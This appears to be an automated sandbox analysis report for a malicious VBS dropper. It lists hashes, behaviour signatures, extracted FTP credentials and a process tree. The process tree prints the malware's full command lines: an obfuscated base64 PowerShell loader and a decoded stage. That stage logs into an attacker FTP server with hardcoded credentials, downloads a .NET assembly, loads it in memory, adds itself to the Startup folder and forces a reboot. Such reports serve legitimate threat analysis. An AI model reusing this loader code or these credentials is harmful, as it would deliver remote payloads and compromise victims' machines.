Overview

overview

10

Static

static

1

1d95f49daf...9a.vbs

windows7-x64

10

1d95f49daf...9a.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2024 18:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1d95f49dafe2eb0e3467f7b52c62906d9784848a8d32570aabd08dd90260fc9a.vbs

  • Size

    681KB

  • MD5

    565637e14d435517b82b9db61b2a41d6

  • SHA1

    8ccb6cd7e3b67cb017b8483fe36664ccd4a33162

  • SHA256

    1d95f49dafe2eb0e3467f7b52c62906d9784848a8d32570aabd08dd90260fc9a

  • SHA512

    6856e52dff58d538dc57a5d61f5683b6e24d8ecee791b8623c650ef4203a36b740023f20c97ed49baf13e0c2986962cdc9d92bfbd7f593eaac430b47d15216d7

  • SSDEEP

    1536:9SSSSSSSSSSSSSSSSSSSSSSSx22222222222222222222222222222222222222T:7LeP6HlC21M

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1d95f49dafe2eb0e3467f7b52c62906d9784848a8d32570aabd08dd90260fc9a.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革GUЌз革dQByЌз革HQЌз革JwЌз革gЌз革CwЌз革IЌз革BlЌз革GoЌз革dwB6Ќз革GgЌз革JЌз革Ќз革gЌз革CwЌз革IЌз革Ќз革nЌз革GgЌз革dЌз革B0Ќз革HЌз革Ќз革cwЌз革6Ќз革C8Ќз革LwBwЌз革GEЌз革cwB0Ќз革GUЌз革YgBpЌз革G4Ќз革LgBmЌз革HIЌз革LwBwЌз革GEЌз革cwB0Ќз革GUЌз革YgBpЌз革G4Ќз革LgBwЌз革GgЌз革cЌз革Ќз革/Ќз革GQЌз革bЌз革Ќз革9Ќз革DEЌз革NЌз革Ќз革xЌз革DYЌз革OQЌз革5Ќз革CcЌз革IЌз革Ќз革oЌз革CЌз革Ќз革XQBdЌз革FsЌз革dЌз革BjЌз革GUЌз革agBiЌз革G8Ќз革WwЌз革gЌз革CwЌз革IЌз革BsЌз革GwЌз革dQBuЌз革CQЌз革IЌз革Ќз革oЌз革GUЌз革awBvЌз革HYЌз革bgBJЌз革C4Ќз革KQЌз革gЌз革CcЌз革SQBWЌз革EYЌз革cgBwЌз革CcЌз革IЌз革Ќз革oЌз革GQЌз革bwBoЌз革HQЌз革ZQBNЌз革HQЌз革ZQBHЌз革C4Ќз革KQЌз革nЌз革DEЌз革cwBzЌз革GEЌз革bЌз革BDЌз革C4Ќз革MwB5Ќз革HIЌз革YQByЌз革GIЌз革aQBMЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革nЌз革CgЌз革ZQBwЌз革HkЌз革VЌз革B0Ќз革GUЌз革RwЌз革uЌз革CkЌз革IЌз革BGЌз革FMЌз革dQB2Ќз革HcЌз革JЌз革Ќз革gЌз革CgЌз革ZЌз革BhЌз革G8Ќз革TЌз革Ќз革uЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HQЌз革bgBlЌз革HIЌз革cgB1Ќз革EMЌз革OgЌз革6Ќз革F0Ќз革bgBpЌз革GEЌз革bQBvЌз革EQЌз革cЌз革BwЌз革EEЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革EEЌз革JwЌз革gЌз革CwЌз革IЌз革Ќз革nЌз革JMhOgCTIScЌз革IЌз革Ќз革oЌз革GUЌз革YwBhЌз革GwЌз革cЌз革BlЌз革FIЌз革LgBnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwЌз革0Ќз革DYЌз革ZQBzЌз革GEЌз革QgBtЌз革G8Ќз革cgBGЌз革DoЌз革OgBdЌз革HQЌз革cgBlЌз革HYЌз革bgBvЌз革EMЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革EYЌз革UwB1Ќз革HYЌз革dwЌз革kЌз革CЌз革Ќз革XQBdЌз革FsЌз革ZQB0Ќз革HkЌз革QgBbЌз革DsЌз革JwЌз革lЌз革EkЌз革aЌз革BxЌз革FIЌз革WЌз革Ќз革lЌз革CcЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZQBqЌз革HcЌз革egBoЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革agBuЌз革GEЌз革ZgЌз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革GoЌз革bgBhЌз革GYЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BqЌз革G4Ќз革YQBmЌз革CQЌз革OwЌз革pЌз革CgЌз革ZQBzЌз革G8Ќз革cЌз革BzЌз革GkЌз革ZЌз革Ќз革uЌз革GoЌз革bgBhЌз革GYЌз革JЌз革Ќз革7Ќз革CkЌз革IЌз革Ќз革nЌз革HQЌз革eЌз革B0Ќз革C4Ќз革MQЌз革wЌз革EwЌз革TЌз革BEЌз革C8Ќз革MQЌз革wЌз革C8Ќз革cgBlЌз革HQЌз革cЌз革B5Ќз革HIЌз革YwBwЌз革FUЌз革LwByЌз革GIЌз革LgBtЌз革G8Ќз革YwЌз革uЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LgBwЌз革HQЌз革ZgBЌз革Ќз革DEЌз革dЌз革BhЌз革HIЌз革YgB2Ќз革GsЌз革YwBzЌз革GUЌз革ZЌз革Ќз革vЌз革C8Ќз革OgBwЌз革HQЌз革ZgЌз革nЌз革CЌз革Ќз革KЌз革BnЌз革G4Ќз革aQByЌз革HQЌз革UwBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgBqЌз革G4Ќз革YQBmЌз革CQЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革CkЌз革JwBЌз革Ќз革EЌз革Ќз革cЌз革BKЌз革DgЌз革NwЌз革1Ќз革DEЌз革MgBvЌз革HIЌз革cЌз革ByЌз革GUЌз革cЌз革BvЌз革GwЌз革ZQB2Ќз革GUЌз革ZЌз革Ќз革nЌз革CwЌз革KQЌз革pЌз革DkЌз革NЌз革Ќз革sЌз革DYЌз革MQЌз革xЌз革CwЌз革NwЌз革5Ќз革CwЌз革NЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革4Ќз革DkЌз革LЌз革Ќз革4Ќз革DEЌз革MQЌз革sЌз革DcЌз革MЌз革Ќз革xЌз革CwЌз革OQЌз革5Ќз革CwЌз革NQЌз革xЌз革DEЌз革LЌз革Ќз革xЌз革DЌз革Ќз革MQЌз革sЌз革DЌз革Ќз革MЌз革Ќз革xЌз革CgЌз革XQBdЌз革FsЌз革cgBhЌз革GgЌз革YwBbЌз革CЌз革Ќз革bgBpЌз革G8Ќз革agЌз革tЌз革CgЌз革KЌз革BsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革GsЌз革cgBvЌз革HcЌз革dЌз革BlЌз革E4Ќз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革G8Ќз革LQB3Ќз革GUЌз革bgЌз革gЌз革D0Ќз革IЌз革BzЌз革GwЌз革YQBpЌз革HQЌз革bgBlЌз革GQЌз革ZQByЌз革EMЌз革LgBqЌз革G4Ќз革YQBmЌз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革GoЌз革bgBhЌз革GYЌз革JЌз革Ќз革7Ќз革CkЌз革dЌз革BuЌз革GUЌз革aQBsЌз革EMЌз革YgBlЌз革FcЌз革LgB0Ќз革GUЌз革TgЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBPЌз革C0Ќз革dwBlЌз革E4Ќз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BqЌз革G4Ќз革YQBmЌз革CQЌз革OwBnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革MgЌз革xЌз革HMЌз革bЌз革BUЌз革DoЌз革OgBdЌз革GUЌз革cЌз革B5Ќз革FQЌз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BsЌз革G8Ќз革YwBvЌз革HQЌз革bwByЌз革FЌз革Ќз革eQB0Ќз革GkЌз革cgB1Ќз革GMЌз革ZQBTЌз革DoЌз革OgBdЌз革HIЌз革ZQBnЌз革GEЌз革bgBhЌз革E0Ќз革dЌз革BuЌз革GkЌз革bwBQЌз革GUЌз革YwBpЌз革HYЌз革cgBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革OwB9Ќз革GUЌз革dQByЌз革HQЌз革JЌз革B7Ќз革CЌз革Ќз革PQЌз革gЌз革GsЌз革YwBhЌз革GIЌз革bЌз革BsЌз革GEЌз革QwBuЌз革G8Ќз革aQB0Ќз革GEЌз革ZЌз革BpЌз革GwЌз革YQBWЌз革GUЌз革dЌз革BhЌз革GMЌз革aQBmЌз革GkЌз革dЌз革ByЌз革GUЌз革QwByЌз革GUЌз革dgByЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革HsЌз革IЌз革BlЌз革HMЌз革bЌз革BlЌз革H0Ќз革IЌз革BmЌз革C8Ќз革IЌз革Ќз革wЌз革CЌз革Ќз革dЌз革Ќз革vЌз革CЌз革Ќз革cgЌз革vЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBuЌз革HcЌз革bwBkЌз革HQЌз革dQBoЌз革HMЌз革IЌз革Ќз革7Ќз革CcЌз革MЌз革Ќз革4Ќз革DEЌз革IЌз革BwЌз革GUЌз革ZQBsЌз革HMЌз革JwЌз革gЌз革GQЌз革bgBhЌз革G0Ќз革bQBvЌз革GMЌз革LQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革7Ќз革CЌз革Ќз革ZQBjЌз革HIЌз革bwBmЌз革C0Ќз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBwЌз革HUЌз革dЌз革ByЌз革GEЌз革dЌз革BTЌз革FwЌз革cwBtЌз革GEЌз革cgBnЌз革G8Ќз革cgBQЌз革FwЌз革dQBuЌз革GUЌз革TQЌз革gЌз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革dwBvЌз革GQЌз革bgBpЌз革FcЌз革XЌз革B0Ќз革GYЌз革bwBzЌз革G8Ќз革cgBjЌз革GkЌз革TQBcЌз革GcЌз革bgBpЌз革G0Ќз革YQBvЌз革FIЌз革XЌз革BhЌз革HQЌз革YQBEЌз革HЌз革Ќз革cЌз革BBЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革EcЌз革cgBVЌз革EEЌз革JЌз革Ќз革gЌз革CgЌз革IЌз革BuЌз革G8Ќз革aQB0Ќз革GEЌз革bgBpЌз革HQЌз革cwBlЌз革EQЌз革LQЌз革gЌз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革bQBlЌз革HQЌз革SQЌз革tЌз革HkЌз革cЌз革BvЌз革EMЌз革IЌз革Ќз革7Ќз革CЌз革Ќз革dЌз革ByЌз革GEЌз革dЌз革BzЌз革GUЌз革cgBvЌз革G4Ќз革LwЌз革gЌз革HQЌз革ZQBpЌз革HUЌз革cQЌз革vЌз革CЌз革Ќз革UQBBЌз革GoЌз革egBJЌз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBhЌз革HMЌз革dQB3Ќз革CЌз革Ќз革ZQB4Ќз革GUЌз革LgBsЌз革GwЌз革ZQBoЌз革HMЌз革cgBlЌз革HcЌз革bwBwЌз革CЌз革Ќз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革UQBBЌз革GoЌз革egBJЌз革DsЌз革KQЌз革gЌз革GUЌз革bQBhЌз革E4Ќз革cgBlЌз革HMЌз革VQЌз革6Ќз革DoЌз革XQB0Ќз革G4Ќз革ZQBtЌз革G4Ќз革bwByЌз革GkЌз革dgBuЌз革EUЌз革WwЌз革gЌз革CsЌз革IЌз革Ќз革nЌз革FwЌз革cwByЌз革GUЌз革cwBVЌз革FwЌз革OgBDЌз革CcЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革EcЌз革cgBVЌз革EEЌз革JЌз革Ќз革7Ќз革CkЌз革JwB1Ќз革HMЌз革bQЌз革uЌз革G4Ќз革aQB3Ќз革HЌз革Ќз革VQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革ZЌз革BJЌз革FIЌз革aQBNЌз革CQЌз革IЌз革Ќз革sЌз革EIЌз革SwBMЌз革FIЌз革VQЌз革kЌз革CgЌз革ZQBsЌз革GkЌз革RgBkЌз革GEЌз革bwBsЌз革G4Ќз革dwBvЌз革EQЌз革LgBpЌз革E0Ќз革bwBhЌз革EkЌз革JЌз革Ќз革7Ќз革DgЌз革RgBUЌз革FUЌз革OgЌз革6Ќз革F0Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革dЌз革B4Ќз革GUЌз革VЌз革Ќз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革ZwBuЌз革GkЌз革ZЌз革BvЌз革GMЌз革bgBFЌз革C4Ќз革aQBNЌз革G8Ќз革YQBJЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革aQBNЌз革G8Ќз革YQBJЌз革CQЌз革OwB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革dЌз革BPЌз革EwЌз革YwBfЌз革EsЌз革YQЌз革zЌз革FoЌз革ZgBvЌз革FgЌз革MgBKЌз革EoЌз革cgBWЌз革GgЌз革bQBWЌз革DkЌз革YwBtЌз革DkЌз革WЌз革BzЌз革HUЌз革WЌз革BtЌз革GoЌз革MQBnЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革HsЌз革IЌз革BlЌз革HMЌз革bЌз革BlЌз革H0Ќз革OwЌз革gЌз革CkЌз革JwЌз革yЌз革DQЌз革dQBYЌз革EoЌз革VЌз革BxЌз革GEЌз革bQBnЌз革HkЌз革TQB0Ќз革EYЌз革egBhЌз革GsЌз革UЌз革BSЌз革DEЌз革cQBfЌз革EkЌз革dgBHЌз革GkЌз革WЌз革BOЌз革GQЌз革cQBhЌз革E4Ќз革MQЌз革nЌз革CЌз革Ќз革KwЌз革gЌз革EYЌз革YQBFЌз革FkЌз革UgЌз革kЌз革CgAIAA9ACAARgBhAEUAWQBSACQAewAgACkAIABXAGkAaQBCAHMAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAFcAaQBpAEIAcwAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABGAGEARQBZAFIAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABkAEkAUgBpAE0AJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAZABJAFIAaQBNACQAewAgACkAIABhAEoAbgBVAGkAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABhAEoAbgBVAGkAJAAgADsA';$txJSA = $qKKzc.replace('Ќз革' , 'A') ;$oXODH = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $txJSA ) ); $oXODH = $oXODH[-1..-$oXODH.Length] -join '';$oXODH = $oXODH.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\1d95f49dafe2eb0e3467f7b52c62906d9784848a8d32570aabd08dd90260fc9a.vbs');powershell $oXODH
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $iUnJa = $host.Version.Major.Equals(2) ;if ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = (New-Object Net.WebClient);$IaoMi.Encoding = [System.Text.Encoding]::UTF8;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\1d95f49dafe2eb0e3467f7b52c62906d9784848a8d32570aabd08dd90260fc9a.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$fanj = (New-Object Net.WebClient);$fanj.Encoding = [System.Text.Encoding]::UTF8;$fanj.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $fanj.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$fanj.dispose();$fanj = (New-Object Net.WebClient);$fanj.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $fanj.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\1d95f49dafe2eb0e3467f7b52c62906d9784848a8d32570aabd08dd90260fc9a.vbs';[Byte[]] $wvuSF = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $wvuSF ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '996141=ld?php.nibetsap/rf.nibetsap//:sptth' , $hzwje , 'true' ) );};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:660

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    948B

    MD5

    c1a54dd5a1ab44cc4c4afd42f291c863

    SHA1

    b77043ab3582680fc96192e9d333a6be0ae0f69d

    SHA256

    c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

    SHA512

    010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ydpt5yo.4jh.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/4120-0-0x00007FFA20C73000-0x00007FFA20C75000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4120-1-0x0000027FF52D0000-0x0000027FF52F2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4120-11-0x00007FFA20C70000-0x00007FFA21731000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4120-12-0x00007FFA20C70000-0x00007FFA21731000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4120-27-0x00007FFA20C70000-0x00007FFA21731000-memory.dmp

    Filesize

    10.8MB

    Download